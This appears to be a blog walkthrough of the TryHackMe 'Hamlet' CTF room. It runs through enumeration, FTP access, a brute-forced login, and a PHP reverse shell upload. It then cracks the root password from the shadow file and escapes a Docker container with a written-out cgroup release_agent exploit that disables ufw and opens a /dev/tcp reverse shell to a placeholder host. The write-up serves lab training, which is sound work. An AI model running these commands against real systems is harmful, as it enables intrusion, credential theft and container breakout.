Today we are going to be looking at the Hamlet room from TryHackMe which is a CTF style fun medium rated room. Lets jump in and get some enumeration done!
Initial enumeration
Going to start with an nmap scan to get things going:
_ nmap 10.10.186.93-sV -sC -A -p- -T4 -vv
As we can see nmap returned some intersting results including what look like an FTP server and a strange port listening on 501. Lets go take a look at these new findings.
Information Gathering
Now that we have found what ports are open lets run a gobuster scan to see if we can dig up anything else before heading over to the web browser.
gobuster dir -u 10.10.186.93-w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
Nice we got a couple of hits from that scan!
We can now take a look at all those ports and directories we found.
Navigating to the IP it loads some kind of landing page talking about a Hamlet Annotation Project with a hyperlink embedded into it.
Clicking the hyperlink takes us to /hamlet.txt which contains quite a lot of information and port 8000 also takes us to the same page.
Port 8080 takes us to to a login portal which we will need to find a way of accessing and port 501 was refusing to load maybe theres another way to get info from this port?
Login portal on 8080
Lets see if the FTP server gives us anonymous access, and if it does lets have a poke around to see if we can get anything of interest.
Brilliant it let us in with anonymous access!
Theres a couple of interesting files here, one giving us some password policy info which will come in handy for brute-forcing the login portal and another giving us the ufw status. We can grab these files now and take a look.
We now know theres a firewall in place and how a user should construct a password, knowing this info and the hint given on the room we can now use cewl to construct a password list and then go and see if we can find anything that resembles a username.
cewl -w passwordlist.txt — lowercase -m 12–14 10.10.186.93/hamlet.txt
So the above command will scrape a password list from /hamlet.txt using only words of 12–14 characters in length and all lowercase.
With our newly created password list in our arsenal we now need to see if we can find a suitable username to Brute-force against and gain access to the login portal.
Having a look at the Hamlet Annotation webpage it appears that Michael goes by the nickname ‘ghost’ I’m edging a bet thats the username for our login portal, lets launch Burp and perform an Intruder attack to see if we can get a hit.
Now i know there are many ways to Brute-force a login portal like Hydra etc, but I usually have Burp open and it did the trick just nicely within a few minutes we got a user:pass match.
Question 1
What is Michael’s password?
Answer: {Redacted}
Now just before we head over and log into the portal lets use the info obtained from our gobuster scan and go and grab Flag1!!
Flag1
Answer:
Now lets use our newly found credentials and gain access to the portal.
Boom! We have access.
Now we have gained access to the WebAnno portal lets have a poke around and see what we can do and to see if we can find any other juicy info lying around.
Ok so we have three users, admin, ghost and ophelia we also have permission to change passwords on all user accounts too. Now i changed the password for the user ‘admin’ and relogged in, this appeared to open up more options for us to have a nosy through and find more juicy info.
Now after having a good root around this WebAnno app i found a snippet of info under curation that Ophelia had written:
Now if this isn’t a password for the WebAnno its either to gain FTP access or for use to access via SSH, after trying to SSH in using the newly gained password and username ‘ophelia’ I just kept getting an error, so i moved on and tried via FTP.
We are golden, lets have a rummage around the FTP server and maybe we will find flag 2.
So here we have three directorieson the FTP server lets ravage all the info!
Lets work through each one from top to bottom, looking in gravediggers there are three files and one looks really interesting gravediggers.py. Having downloaded the python file I took a look inside and there I found Flag 2. You can also do nc 10.10.186.93 501 where you will be prompted to answer a few questions and the end result will be flag 2, however i found this hit and miss as it always seemed to just hang.
Flag 2
Our next port of call is ophelia’s directory and look what she has left for us! Excellent looks like we just nailed flag 3.
Flag 3
Sweet we are now 50% of the way to completing this room, I reckon our next step is to get a reverse shell back our machine and WebAnno lets us upload documents, so lets go and craft our reverse shell and see if we can get a foothold on this server.
Foothold
Now I’m using a PHP reverse shell payload from pentest monkey which I downloaded from here
As we can see our reverse shell payload has uploaded successfully.
Now we need to try and find our path to execute the reverse shell payload, I found two ways this was possible. The first way was to navigate to the file using FTP and noting the path taken, the other way was if you view the source on port 8000 you will see an iframe tag which points to hamlet.txt.
We know our payload is under documents so we can assume our path will be /repository/project/0/document/1/source/rev.php I’m using a 1 after document as I’m assuming that each uploaded file will increase sequentially.
Lets give it a go and get a shell to the box.
Setup your listener:
Then navigate to http://10.10.186.93:8000/repository/project/0/document/1/source/rev.php
We are in!!
One directory that stood out to me was stage, navigate to here to find flag 4.
Flag 4
Our next step is to elevate our privilege’s to root, If you display the contents of the shadow file you will see the root hash and along with some Google fu you will also see its encrypted using the yescrypt algorithm.
Privilege Escalation
Lets go and use our old friend John to crack the root hash.
First off we need to unshadow the hash:
unshadow passwd.txt shadow.txt > unshadowed.txt
Then let John work its magic;
_ john — wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt — format=crypt
Lets escalate our privs and get root access!
Navigating into our root directory we find flag 5!
Flag 5
Lets upload linpeas to the server as it seems that we are in some kind of Docker container and we need to break out of it.
Setup a python server on your attack box
Then on the victim box navigate to /tmp directory and upload linpeas using curl -O http://10.11.59.188:9000/linpeas.sh now make it executable chmod +x linpeas.sh and then run it!
Linpeas has confirmed we are trapped inside a container, but how do we escape?
Escaping The Container
Took me a little while to Google this one and get an exploit I could work with, I found the info in the below link to be of great use.
Having read all that info lets break out of this prison cell and root this box!!
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/bash' > /cmd
echo 'ufw --force disable' >> /cmd
echo "bash -i >& /dev/tcp/IP-GOES-HERE/9001 0>&1" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"Boom! We are free!!!!
Now lets go and retrieve flag 6
Flag 6
Hamlet is pwned! I thoroughly enjoyed this room and hope you have too, until next time I’ll see you later!
